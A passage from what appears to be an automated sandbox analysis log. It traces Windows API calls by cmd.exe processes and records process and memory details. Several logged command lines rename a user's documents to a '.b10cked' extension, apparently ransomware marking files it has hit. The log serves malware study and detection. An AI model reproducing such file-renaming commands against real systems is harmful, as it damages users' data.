lpData=0x26ecc0*=0x1, 
lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x0, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x4, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x4) returned 0x0 [0234.531] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ecbc, lpData=0x26ecc0, lpcbData=0x26ecb8*=0x1000 | out: lpType=0x26ecbc*=0x0, lpData=0x26ecc0*=0x9, lpcbData=0x26ecb8*=0x1000) returned 0x2 [0234.531] RegCloseKey (hKey=0x40) returned 0x0 [0234.531] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.531] srand (_Seed=0x5b8863c2) [0234.531] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" [0234.531] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" [0234.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.532] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.532] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.532] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.532] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.532] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.532] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.532] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.532] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.532] GetEnvironmentStringsW () returned 0x3a22e8* [0234.532] FreeEnvironmentStringsW (penv=0x3a22e8) returned 1 [0234.532] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.532] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.532] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.532] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.533] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.533] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.533] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.533] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.533] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0234.533] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fa80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.533] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26fa80, lpFilePart=0x26fa7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26fa7c*="Desktop") returned 0x18 [0234.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f7fc | out: lpFindFileData=0x26f7fc) returned 0x3a0028 [0234.533] FindClose (in: hFindFile=0x3a0028 | out: hFindFile=0x3a0028) returned 1 [0234.533] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.534] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.534] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.534] GetEnvironmentStringsW () returned 0x3a2b08* [0234.534] FreeEnvironmentStringsW (penv=0x3a2b08) returned 1 [0234.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.534] GetConsoleOutputCP () returned 0x1b5 [0234.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) 
returned 1 [0234.534] GetUserDefaultLCID () returned 0x409 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="0") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fbc0, cchData=128 | out: lpLCData="1") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.535] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.536] GetConsoleTitleW (in: lpConsoleTitle=0x3908f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0234.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.536] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.537] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.537] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.537] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.537] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.537] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.537] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.537] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.540] GetConsoleTitleW (in: lpConsoleTitle=0x26f8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.540] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.540] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.540] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.540] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.540] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.540] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0234.540] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.540] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.540] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.540] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.540] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.540] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.540] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.540] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.540] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.541] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.541] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.541] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.541] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.541] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.542] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f674, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f66c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f66c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.542] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.542] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.543] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.543] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.543] _wcsicmp (_String1="oR2F.csv", _String2=".") returned 65 [0234.543] _wcsicmp (_String1="oR2F.csv", _String2="..") returned 65 [0234.543] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26effc, lpFilePart=0x26efe4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x26efe4*="oR2F.csv") returned 0x30 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0234.544] _wcsicmp (_String1="oR2F.csv", _String2=".") returned 65 [0234.544] _wcsicmp (_String1="oR2F.csv", _String2="..") returned 
65 [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26f478, lpFilePart=0x26f210 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x26f210*="oR2F.csv") returned 0x30 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] SetErrorMode (uMode=0x0) returned 0x0 [0234.544] SetErrorMode (uMode=0x1) returned 0x0 [0234.544] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", nBufferLength=0x104, lpBuffer=0x26f680, lpFilePart=0x26f210 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", lpFilePart=0x26f210*="oR2F.csv.b10cked") returned 0x38 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] SetLastError (dwErrCode=0x0) [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv.b10cked")) returned 0xffffffff [0234.544] GetLastError () returned 0x2 [0234.544] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", fInfoLevelId=0x1, lpFindFileData=0x26eb8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb8c) returned 0x390eb0 [0234.545] FindNextFileW (in: hFindFile=0x390eb0, lpFindFileData=0x26eb8c | out: lpFindFileData=0x26eb8c) returned 0 [0234.545] GetLastError () returned 0x12 [0234.545] FindClose (in: hFindFile=0x390eb0 | out: hFindFile=0x390eb0) returned 1 [0234.546] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", fInfoLevelId=0x1, lpFindFileData=0x3a1c08, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1c08) returned 0x390eb0 [0234.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", nBufferLength=0x104, lpBuffer=0x26ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", lpFilePart=0x0) returned 0x38 [0234.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x0) returned 0x30 [0234.546] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.546] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv.b10cked"), dwFlags=0x3) returned 1 [0234.547] FindClose (in: hFindFile=0x390eb0 | out: hFindFile=0x390eb0) returned 1 [0234.547] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26edd8 | out: _Buffer=" 1") returned 9 [0234.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.547] GetFileType (hFile=0x7) returned 0x2 [0234.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.707] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ed64 | out: lpMode=0x26ed64) returned 1 [0234.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ed98 | out: lpConsoleScreenBufferInfo=0x26ed98) returned 1 [0234.707] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, 
nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0234.708] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x26edd8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0234.708] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26edbc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x26edbc*=0x1a) returned 1 [0234.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.708] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.708] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.709] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.709] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.709] SetConsoleInputExeNameW () returned 0x1 [0234.709] GetConsoleOutputCP () returned 0x1b5 [0234.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.709] exit (_Code=0) Process: id = "631" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34999 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35001 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35002 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35003 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35004 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35005 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35006 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 35007 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35330 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35331 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35332 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35333 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35334 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35335 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35336 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35337 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35338 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 